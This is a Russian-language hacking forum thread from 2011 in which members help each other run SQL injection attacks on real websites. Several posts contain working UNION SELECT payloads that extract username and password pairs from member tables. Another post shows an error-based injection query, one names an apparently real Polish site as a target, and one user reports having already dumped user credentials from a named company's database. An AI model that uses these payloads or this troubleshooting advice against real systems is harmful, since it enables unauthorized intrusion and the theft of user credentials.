HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #18471  
Старый 03.11.2011, 15:07
Boolean
Guest
Сообщений: n/a
Провел на форуме:
40748

Репутация: 78
По умолчанию

Попробуй указать базу данных этой таблицы.
 
Ответить с цитированием

  #18472  
Старый 03.11.2011, 15:08
bbugz
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

Всем Привет.Вытянул из базы логины и пароли юзеров,патюсь залогинится выдет такую ошибку

Цитата:
Сообщение от None  
Fatal error: Uncaught exception 'Exception' with message '_doQuery: [Error message: Could not execute statement] [Last executed query: SELECT logged_in FROM users WHERE username = 'j' AND password = '5eb59a1c45ec8d0eafe705c45aa15ce1'] [Native code: 1054] [Native message: Unknown column 'logged_in' in 'field list'] ' in /home/marketing/emaxxtech.com/includes/functions.php:6 Stack trace: #0 /home/marketing/emaxxtech.com/login.php(14): error_handler(Object(MDB2_Error)) #1 {main} thrown in /home/marketing/emaxxtech.com/includes/functions.php on line 6
что это значит и можно ли как-то использовать?

p.s. только учусь по данной теме ,поэтому не судим строго,очень прошу..
 
Ответить с цитированием

  #18473  
Старый 03.11.2011, 15:13
s000r
Guest
Сообщений: n/a
Провел на форуме:
2918

Репутация: 0
По умолчанию

Цитата:
Сообщение от Boolean  
Boolean said:
Попробуй указать базу данных этой таблицы.
аналогичная ситуация...
 
Ответить с цитированием

  #18474  
Старый 03.11.2011, 15:17
Boolean
Guest
Сообщений: n/a
Провел на форуме:
40748

Репутация: 78
По умолчанию

Цитата:
Сообщение от s000r  
s000r said:
аналогичная ситуация...
Показывай ссылку, или в пм.

upd: все, решили, проблема была как я и сказал, в указателе на базу данных с этой таблицей.
 
Ответить с цитированием

  #18475  
Старый 03.11.2011, 20:10
Einstein
Guest
Сообщений: n/a
Провел на форуме:
3346

Репутация: 0
По умолчанию

Люди помогите с sql

Имеется SQL инъекция.

www.xxx.xx/title.php?id=-32+union+select+1

версия: 5.1.49

нашел таблицу members

в таблице есть колонки: username, password

пишу запрос:

www.xxx.xx/title.php?id=-32+union+select+username from members limit 0,1 ---- не выводится ничего и при limit 1,1 и 1,2

но при:

www.xxx.xx/title.php?id=-32+union+select+password from members limit 0,1 ---все пароли выводятся

В чем может быть проблема?
 
Ответить с цитированием

  #18476  
Старый 03.11.2011, 20:39
tabletkO
Guest
Сообщений: n/a
Провел на форуме:
28093

Репутация: 11
По умолчанию

Einstein,

может просто нет username-ов?) Ссылку кинь в ПМ.

P.S. Попробуй UNHEX(HEX(username))

www.xxx.xx/title.php?id=-32+union+select+UNHEX(HEX(username))+from+members+ limit+0,1+--+
 
Ответить с цитированием

  #18477  
Старый 03.11.2011, 21:41
Einstein
Guest
Сообщений: n/a
Провел на форуме:
3346

Репутация: 0
По умолчанию

ай-яй.

Все получилось помогло вот что:

www.xxx.xx/title.php?id=-34+union+select+concat(username,char(58),password) ...---b все вывелось.

tabletkO спасибо, что откликнулся =)
 
Ответить с цитированием

  #18478  
Старый 04.11.2011, 00:59
omg_it_glowZ
Guest
Сообщений: n/a
Провел на форуме:
12399

Репутация: -2
По умолчанию

Цитата:
Сообщение от Kuteke  
Kuteke said:
NetDevilz SQL Scanner в гугл пропиши
не интересуют программы, которые просто ищут ошибку при подстановке " ' ".

Это ты видать не заметил, да?
 
Ответить с цитированием

  #18479  
Старый 04.11.2011, 01:47
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

Проблемка...

При выводе инфы из БД пишет Subquery returns more than 1 row

запрос:

?id=1+and(select+1+from(select+count(*),concat((se lect+2+from+users+limit+0,1),floor(rand(0)*2))x+fr om+users+group+by+x)a)+and+1=1
 
Ответить с цитированием

  #18480  
Старый 04.11.2011, 16:58
vaddd
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125

Репутация: 3
По умолчанию

http://www.mup.lublin.pl/db/popup.php?action=results&poll_ident=4%20order%20by %20123

как такое крутить? почему при order by 123 нет ошибки?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ